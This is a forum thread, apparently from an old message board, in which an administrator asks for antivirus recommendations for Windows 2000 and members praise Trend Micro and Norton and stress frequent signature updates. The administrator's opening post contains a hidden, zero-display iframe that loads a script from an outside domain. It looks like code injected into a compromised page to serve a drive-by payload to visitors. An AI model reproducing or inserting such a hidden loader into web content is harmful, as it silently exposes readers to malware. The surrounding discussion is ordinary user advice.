+ Reply to Thread
    Administrator

Arrow Opinions on Anti-Virus Software...

My fellow friends i want your opinions on Anti Virus software for the pc.

I am running Windows 2000 Professional and am curently using Panda Anti Virus Titanium.

i would appreciate any opinons or suggestions...

lets hope some of you will find this little cubby hole and reply.. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

(Click a sponser today!)

Anti-Virus Software

Marc, I found your "cubby hole"!

I'm running WIN2048 Pro also and using Ontrack's System Suite with their version of Trend Micro's anti-virus software. Very good real-time integrated fire wall and anti-virus. Real time scanning of incomming e-mail and attachments. Trend has an excellent site for the times I've had something that had to be manually cleaned or I needed a special .exe to dig deep and eradicate the bug. Highly recommended and you get a whole suite of "Norton" type utilities, as well. Has gotten good reviews.

www.ontrack.com
    Gary

Been using Norton AntiVirus for years. Whenever a virus has been found, it's from my machine finding one on a client's network (or from an email). It has never been the client's network finding one on my machine... This is even on networks where the admin says they are current and bullet-proof...

Whatever you choose, be sure they do very frequent virus list updates (and you download it frequently). The software is useless unless it's virus list is current.
    Cliff

Administrator

Arrow

thanks gentlemen for finding my little cubby hole!

please keep the recommendations coming...